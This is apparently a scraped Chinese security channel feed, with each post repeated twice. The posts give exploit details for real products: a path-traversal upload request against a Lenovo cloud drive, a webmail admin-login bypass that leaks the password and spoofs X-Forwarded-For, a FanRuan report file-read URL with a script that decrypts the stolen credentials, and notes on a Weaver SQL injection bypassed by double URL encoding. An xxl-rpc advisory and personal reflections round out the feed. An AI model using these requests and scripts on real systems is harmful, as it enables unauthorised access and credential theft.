联想网盘任意文件上传漏洞
POST /write?neid=1&hash=../../../../../../../dragonball/srv/tomcat/webapps/stream_server/ttt.txt&status=1 HTTP/1.1
Host:xxxx
Cache-Control:max-age=0
Sec-Ch-Ua:"Chromium";v="117", "Not;A=Brand";v="8"
Sec-Ch-Ua-Mobile:?0
Sec-Ch-Ua-Platform:"Windows"
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site:none
Sec-Fetch-Mode:navigate
Sec-Fetch-User:?1
Sec-Fetch-Dest:document
Accept-Language:zh-CN,zh;q=0.9
Connection:close
Content-Type:application/octet-stream
Accept-Encoding:gzip, deflate
Content-Length:8
POST /write?neid=1&hash=../../../../../../../dragonball/srv/tomcat/webapps/stream_server/ttt.txt&status=1 HTTP/1.1
Host:xxxx
Cache-Control:max-age=0
Sec-Ch-Ua:"Chromium";v="117", "Not;A=Brand";v="8"
Sec-Ch-Ua-Mobile:?0
Sec-Ch-Ua-Platform:"Windows"
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site:none
Sec-Fetch-Mode:navigate
Sec-Fetch-User:?1
Sec-Fetch-Dest:document
Accept-Language:zh-CN,zh;q=0.9
Connection:close
Content-Type:application/octet-stream
Accept-Encoding:gzip, deflate
Content-Length:8
👍1🤔1
WEBMAIL任意用户登录漏洞
/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin
回显是下面这个
"errorMsg":"64d880ce7b737912ccb1"
使用回显的 errormsg 作为密码,用户名为 admin 即可登录
使用手机验证码登录的打不了
显示 IP 受限的话添加头 X-Forwarded-For: 127.0.0.1 即可
如果有回显但登录失败的话,使用
/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin@+证书 or 根域名获取 errormsg 然后在登录就行了
/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin
回显是下面这个
"errorMsg":"64d880ce7b737912ccb1"
使用回显的 errormsg 作为密码,用户名为 admin 即可登录
使用手机验证码登录的打不了
显示 IP 受限的话添加头 X-Forwarded-For: 127.0.0.1 即可
如果有回显但登录失败的话,使用
/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin@+证书 or 根域名获取 errormsg 然后在登录就行了
👍1
帆软报表 V8 get_geo_json 任意文件读取漏洞
WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
获得账号密码后进行解密,解密脚本如下
解密脚本
cipher = 'XXXXXXXXXXX' #密文
PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23]
Password = ""
cipher = cipher[3:]
for i in range(int(len(cipher) / 4)):
c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
Password = Password + chr(c2)
print (Password)
WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
获得账号密码后进行解密,解密脚本如下
解密脚本
cipher = 'XXXXXXXXXXX' #密文
PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23]
Password = ""
cipher = cipher[3:]
for i in range(int(len(cipher) / 4)):
c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
Password = Password + chr(c2)
print (Password)
👍1
xxl-rpc远程命令执行漏洞
影响产品
version<=1.7.0(最新版)
利用状态
在野利用(已公开poc)
漏洞详情
xxl-rpc是一个分布式服务框架,提供稳定高性能的RPC远程服务调用功能开源软件。
当攻击者能够访问xxl-rpc框架的服务方7080端口时,利用该漏洞可在无需认证的情况下执行任意命令,从而导致服务器被入侵控制。
处置建议:
目前官方未发布修复版本,建议通过白名单等方式临时限制xxl-rpc服务端口(默认「7080」)的访问权限,并且如无必要关闭对公网开放。
影响产品
version<=1.7.0(最新版)
利用状态
在野利用(已公开poc)
漏洞详情
xxl-rpc是一个分布式服务框架,提供稳定高性能的RPC远程服务调用功能开源软件。
当攻击者能够访问xxl-rpc框架的服务方7080端口时,利用该漏洞可在无需认证的情况下执行任意命令,从而导致服务器被入侵控制。
处置建议:
目前官方未发布修复版本,建议通过白名单等方式临时限制xxl-rpc服务端口(默认「7080」)的访问权限,并且如无必要关闭对公网开放。
👍1
「2023HW漏洞...1更新).pdf」,复制整段内容,打开最新版「夸克APP」即可获取。
无需下载在线播放视频,畅享原画5倍速,支持电视投屏。
/!b48831r4FG!:/
链接:https://pan.quark.cn/s/fbb38ab6826c
无需下载在线播放视频,畅享原画5倍速,支持电视投屏。
/!b48831r4FG!:/
链接:https://pan.quark.cn/s/fbb38ab6826c
pan.quark.cn
夸克网盘分享
夸克网盘是夸克推出的一款云服务产品,功能包括云存储、高清看剧、文件在线解压、PDF一键转换等。通过夸克网盘可随时随地管理和使用照片、文档、手机资料,目前支持Android、iOS、PC、iPad。
老年人复健泛微注入漏洞全过程实录
已知漏洞情报:后端mssql库cityaction区块存在注入,类型为堆叠注入,文件路径为/mobilemode/Action.jsp ,情报真实性未知。我不知道各位大黑客看到这个情报会第一时间关注哪里,我反正是最后一句。考恁娘,还好给出了具体的文件路径,白盒,就算是假的也不至于浪费很多时间
引入string invoker字符常量,调用getParameter方法处理参数,往下接受invoker这个参数并去掉了字符串两侧空格,new string对象进行第一次base64编码,中间还检查了参数是否为空,防止了基于回显的空行二次注入。17到19行检查参数是否是编码后的com.开头,如果不是就会把字符串进行一次base64解码。看到这里代码很常规并且很严格。往下看登录部分,代码是先检查了一下是否登录,没登录直接抛异常。检查登录后使用Class.forName去加载invoker这个全路径类名,26行检查加载的类是否是BaseAction.class的派生类,若是则会调用execute_proxy方法,不是则抛出异常
根据大学多年日弄.class文件的经验直觉告诉我肯定是BaseAction会出问题的。堆叠注入大多数是的存在场景是mysql+php里使用了mysqli_multi_query这种函数,他的存在条件比较严格。在这按照默认结束符非法造成sql语句堆叠的思路能干啥,最开始想的是getter/setter循环注入边变形成堆叠,具体思路懒得讲了,最后百度一下发现BaseAction在填充属性之前肯定在其他路径下Exception的某级缓存,问gpt他日🐴就说了一堆要注意过滤严格检查参数类型这种又大又空的废话,但是百度也提醒了我BaseAction的派生类,脑壳痛,cpu有点转不动了,先上tg吹吹水
吹完回来看一下这个父类,有两个函数一个是getAction(),我记混了记成jsp里面赋值过后提交表单到某某url.jsp的意思了,当时我人就麻了,cnm,这玩意审一下还得一起看其他jsp文件啊你特么鲨了我算了吧,然后单位的🐶头军师听到我我搁那叫马上就过来帮忙看了,又查了一下资料最后才搞清楚他的作用其实是用来获取请求参数上的action的值,和后面这个execute_proxy()一起,代理方法调用execute()方法,这个execute_proxy()才是jsp页面中真正调用的方法,必然有子类,这下舒服了。跟进查找可以找到BaseMobileAction.class。这个B什么什么的class文件已经实现了execute方法,但是他还是抽象类(不是我平时群里说的那个抽象)他肯定还有他的子类。联系他的上下文,首先通过getAction()方法获取了请求action的值,然后是getDeclareMethods()获取了自身类所有的全部方法,遍历了每一个方法然后获取上面的注解,如果name值不为空则执行该方法并获取结果,加上情报里说明了是堆叠,所以就很清晰的知道……
知道恁🐴,我当时看到这里的时候还是一点思路没有,因为我一直想的是泛微被打了这么多次过后对数组遍历之前的字符过滤是很严格的,我是真的没特么想到citites参数双重url编码一下就能绕过了,异想天开了半天都想到java api去了。然后就是到点下班吃晚饭,出门没了两分钟像睡醒一样突然反应过来。最后我们产品怎么更新来防范的就不讲了,商业机密,免得你们几个byd日穿雷池
已知漏洞情报:后端mssql库cityaction区块存在注入,类型为堆叠注入,文件路径为/mobilemode/Action.jsp ,情报真实性未知。我不知道各位大黑客看到这个情报会第一时间关注哪里,我反正是最后一句。考恁娘,还好给出了具体的文件路径,白盒,就算是假的也不至于浪费很多时间
引入string invoker字符常量,调用getParameter方法处理参数,往下接受invoker这个参数并去掉了字符串两侧空格,new string对象进行第一次base64编码,中间还检查了参数是否为空,防止了基于回显的空行二次注入。17到19行检查参数是否是编码后的com.开头,如果不是就会把字符串进行一次base64解码。看到这里代码很常规并且很严格。往下看登录部分,代码是先检查了一下是否登录,没登录直接抛异常。检查登录后使用Class.forName去加载invoker这个全路径类名,26行检查加载的类是否是BaseAction.class的派生类,若是则会调用execute_proxy方法,不是则抛出异常
根据大学多年日弄.class文件的经验直觉告诉我肯定是BaseAction会出问题的。堆叠注入大多数是的存在场景是mysql+php里使用了mysqli_multi_query这种函数,他的存在条件比较严格。在这按照默认结束符非法造成sql语句堆叠的思路能干啥,最开始想的是getter/setter循环注入边变形成堆叠,具体思路懒得讲了,最后百度一下发现BaseAction在填充属性之前肯定在其他路径下Exception的某级缓存,问gpt他日🐴就说了一堆要注意过滤严格检查参数类型这种又大又空的废话,但是百度也提醒了我BaseAction的派生类,脑壳痛,cpu有点转不动了,先上tg吹吹水
吹完回来看一下这个父类,有两个函数一个是getAction(),我记混了记成jsp里面赋值过后提交表单到某某url.jsp的意思了,当时我人就麻了,cnm,这玩意审一下还得一起看其他jsp文件啊你特么鲨了我算了吧,然后单位的🐶头军师听到我我搁那叫马上就过来帮忙看了,又查了一下资料最后才搞清楚他的作用其实是用来获取请求参数上的action的值,和后面这个execute_proxy()一起,代理方法调用execute()方法,这个execute_proxy()才是jsp页面中真正调用的方法,必然有子类,这下舒服了。跟进查找可以找到BaseMobileAction.class。这个B什么什么的class文件已经实现了execute方法,但是他还是抽象类(不是我平时群里说的那个抽象)他肯定还有他的子类。联系他的上下文,首先通过getAction()方法获取了请求action的值,然后是getDeclareMethods()获取了自身类所有的全部方法,遍历了每一个方法然后获取上面的注解,如果name值不为空则执行该方法并获取结果,加上情报里说明了是堆叠,所以就很清晰的知道……
知道恁🐴,我当时看到这里的时候还是一点思路没有,因为我一直想的是泛微被打了这么多次过后对数组遍历之前的字符过滤是很严格的,我是真的没特么想到citites参数双重url编码一下就能绕过了,异想天开了半天都想到java api去了。然后就是到点下班吃晚饭,出门没了两分钟像睡醒一样突然反应过来。最后我们产品怎么更新来防范的就不讲了,商业机密,免得你们几个byd日穿雷池
👍3
客观总结一下最近的状态
java和php的老底虽然在,但是反应明显不如之前快了,很多东西记不到,记不到还好可以搜,就怕记错在那忙活半天
对框架理解有点过时了,很多时候对于waf这些安全产品和框架本身代码规范的这个平衡的感觉有偏差,可能是卖产品卖多了广告词把自己都骗到了
玩雷池玩多了,脑子里对于注入这些的认识往语义研判预判这种混沌方向过度发展,很多基本手法的最新运用反而没有关注,比如这个堆叠,这个url编码,朴实无华就这么简单,没有那些花里胡哨的搞法但人家就是有用
懒,经常搞到一半就看手机走神,一件事情可以拖一整天拖到最后才做。当然除了我本人的问题之外我感觉和我上班时间也有关系,十点半才下班老是想着反正都还有这么久的工作时间不如先摸鱼
戒色,真的要戒色,男生更是,色字头上一把刀,真的影响状态,还有熬夜,整个人虽然没有明显症状但从早上起来就觉得累,白天人都是死绵绵的👿
java和php的老底虽然在,但是反应明显不如之前快了,很多东西记不到,记不到还好可以搜,就怕记错在那忙活半天
对框架理解有点过时了,很多时候对于waf这些安全产品和框架本身代码规范的这个平衡的感觉有偏差,可能是卖产品卖多了广告词把自己都骗到了
玩雷池玩多了,脑子里对于注入这些的认识往语义研判预判这种混沌方向过度发展,很多基本手法的最新运用反而没有关注,比如这个堆叠,这个url编码,朴实无华就这么简单,没有那些花里胡哨的搞法但人家就是有用
懒,经常搞到一半就看手机走神,一件事情可以拖一整天拖到最后才做。当然除了我本人的问题之外我感觉和我上班时间也有关系,十点半才下班老是想着反正都还有这么久的工作时间不如先摸鱼
戒色,真的要戒色,男生更是,色字头上一把刀,真的影响状态,还有熬夜,整个人虽然没有明显症状但从早上起来就觉得累,白天人都是死绵绵的👿
🐳4👍2
